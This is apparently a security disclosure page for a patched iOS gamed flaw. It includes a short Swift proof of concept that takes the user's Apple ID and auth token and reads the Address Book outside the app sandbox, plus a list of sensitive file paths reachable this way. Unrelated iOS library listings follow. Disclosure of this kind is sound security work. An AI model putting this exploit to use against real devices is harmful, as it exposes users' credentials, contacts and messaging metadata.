iOS gamed exploit (fixed in 15.0.2)

Overview

iOS gamed exploit (fixed in 15.0.2)

Update: Apple has quietly fixed this in iOS 15.0.2 without any kind of public acknowledgement or credit.

Any app installed from the App Store may access the following data without any prompt from the user:

  • Apple ID email and full name associated with it
  • Apple ID authentication token which allows to access at least one of the endpoints on *.apple.com on behalf of the user
  • Complete file system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about all user's interaction with these contacts (including timestamps and statistics), also some attachments (like URLs and texts))
  • Complete file system read access to the Speed Dial database and the Address Book database including contact pictures and other metadata like creaton and modification dates (I've just checked on iOS 15 and this one inaccessible, so that must have been quietly fixed)

Here is a short proof of concept.

let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
	accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
		let appleID = response.credential.accountName
		let token = response.credential.authenticationToken
	}

	utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
		let addressBookData = data
	}
}

How it happens:

  • XPC service com.apple.gamed doesn't properly check for com.apple.developer.game-center entitlement
  • Even if Game Center is disabled on the device, invoking getServicesForPID:localPlayer:reply: returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, etc.).
  • If game center is enabled on the device (even if it's not enabled for the app in App Store Connect and app doesn't contain com.apple.developer.game-center entitlement), invoking authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing Apple ID of the user, DSID and Game Center authentication token (which allows to send requests to https://gc.apple.com on behalf of the user). Invoking getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing first and last name of the user's Apple ID. Invoking getFriendsForPlayer:handler: on GKFriendService return an object with information about user's friend in Game Center.
  • Even if game center is disabled, it's not enabled for the app in App Store Connect and app doesn't contain com.apple.developer.game-center entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService allows to read arbitrary files outside of the app sandbox by passing file URLs to that method. Among the files (but not limited to) that can be accessed that way are the following: /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist - contains mobile gestalt cache /var/mobile/Library/CoreDuet/People/interactionC.db - contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about user's interaction with these contacts (including timestamps and statistics) /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist - contains favorite contacts and their phone numbers /var/mobile/Library/AddressBook/AddressBook.sqlitedb - contains complete Address Book database /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb - contains photos of Address book contacts
  • Invoking cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService might allow to write arbitrary data to a location outside of the app sandbox.

On the Apple Security Bounty Program page this vulnerabilty is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).

You might also like...
VMaskTextField is a library which create an input mask for iOS.
VMaskTextField is a library which create an input mask for iOS.

VMaskTextField An inputmask helps the user with the input by ensuring a predefined format. This can be useful for dates, numerics, phone numbers etc U

📝 The next in the generations of 'growing textviews' optimized for iOS 8 and above.
📝 The next in the generations of 'growing textviews' optimized for iOS 8 and above.

NextGrowingTextView The next in the generations of 'growing textviews' optimized for iOS 8 and above. As a successor to HPGrowingTextView, NextGrowing

Animated UITextField and UITextView replacement for iOS
Animated UITextField and UITextView replacement for iOS

AnimatedTextInput iOS custom text input component used in the Jobandtalent app. Installation Use cocoapods to install this custom control in your proj

Awesome TextField is a nice and simple libriary for iOS and Mac OSX
Awesome TextField is a nice and simple libriary for iOS and Mac OSX

Awesome TextField is a nice and simple libriary for iOS and Mac OSX. It's highly customisable and easy-to-use tool. Works perfectly for any registration or login forms in your app.

The famous iOS search bar with auto completion feature implemented.
The famous iOS search bar with auto completion feature implemented.

PRESENTATION This search bar will allow you to offer suggestions words to your users when they are looking for something using default iOS search bar.

⚡️ A library of widgets and helpers to build instant-search applications on iOS.
⚡️ A library of widgets and helpers to build instant-search applications on iOS.

By Algolia. InstantSearch family: InstantSearch iOS | InstantSearch Android | React InstantSearch | InstantSearch.js | Angular InstantSearch | Vue Ins

🔍 An elegant search controller which replaces the UISearchController for iOS (iPhone & iPad) .
🔍 An elegant search controller which replaces the UISearchController for iOS (iPhone & iPad) .

🔍 An elegant search controller for iOS. QQ chat room Features Support a variety of hot search style Support a variety of search history style Support

Declarative text styles and streamlined Dynamic Type support for iOS
Declarative text styles and streamlined Dynamic Type support for iOS

StyledText StyledText is a library that simplifies styling dynamic text in iOS applications. Instead of having to use attributed strings every time yo

Custom emoji rendering library for iOS apps with support for GIF & still images
Custom emoji rendering library for iOS apps with support for GIF & still images

Custom emoji rendering library for iOS apps with support for GIF & still images - plug-in extension for UITextView - performance, cache ✅ - Made with 💘 by @GetStream

Comments
iOS 15 0-day exploit (still works in 15.0.2)

nehelper enumerate installed apps 0-day (iOS 15.0) I've updated this code to avoid using Private API directly. Read more in my blog post. However, tha

null 158 Nov 19, 2022
A customisable view for entering arbitrary length pins, codes or passwords in iOS. Supports iOS 12 one time codes.

CBPinEntryView CBPinEntryView is a view written in Swift to allow easy and slick entry of pins, codes or passwords. It allows backspacing, dismissal o

Chris Byatt 183 Dec 5, 2022
AEOTPTextField - A beautiful iOS OTP Text Field library, written in Swift with full access customization in UI.

AEOTPTextField - A beautiful iOS OTP Text Field library, written in Swift with full access customization in UI.

Abdelrhman Kamal 79 Jan 3, 2023
VKPinCodeView is simple and elegant UI component for input PIN. You can easily customise appearance and get auto fill (OTP) iOS 12 feature right from the box.

Features Variable PIN length Underline, border and custom styles The error status with / without shake animation Resetting the error status manually,

Vladimir Kokhanevich 95 Nov 24, 2022
A SwiftUI TextField with a prompt (or placeholder) that floats above the text field when active or not empty. Requires iOS 15.

FloatingPromptTextField A prompt is the label in a text field that informs the user about the kind of content the text field expects. In a default Tex

Emilio Peláez 43 Nov 3, 2022
Focus text field in SwiftUI dynamically and progress through form using iOS keyboard.

Focuser Focuser allows to focus SwiftUI text fields dynamically and implements ability move go through the form using Keyboard for iOS 13 and iOS 14.

Art Technologies 118 Dec 25, 2022
Provides a SwiftUI multi-line TextView implementation including support for auto-sizing. (iOS)

TextView Also available as a part of my SwiftUI+ Collection – just add it to Xcode 13+ Provides a SwiftUI multi-line TextView implementation with supp

SwiftUI+ 51 Jan 3, 2023
Transition from any SwiftUI Text view into an inline navigation bar title when the view is scrolled off-screen, as seen in Apple's TV & TestFlight iOS apps.

SwiftUI Matched Inline Title Transition from any SwiftUI Text view into an inline navigation bar title when the view is scrolled off-screen, as seen i

Seb Jachec 19 Oct 9, 2022
iOS - Subclass of UITextField to achieve autocompletion for Place Search like Google Places, Uber and Much more apps having maps.

MVAutocompletePlaceSearchTextField iOS - Subclass of UITextField to achieve autocompletion for Place Search like Google Places, Uber and Much more app

Mrugrajsinh Vansadia 68 May 27, 2022
UITextfield subclass with autocomplete menu. For iOS.

MLPAutoCompleteTextField "We believe that every tap a user makes drains a tiny bit of their energy and patience. Typing is one of the biggest expendit

Eddy Borja 1.2k Nov 11, 2022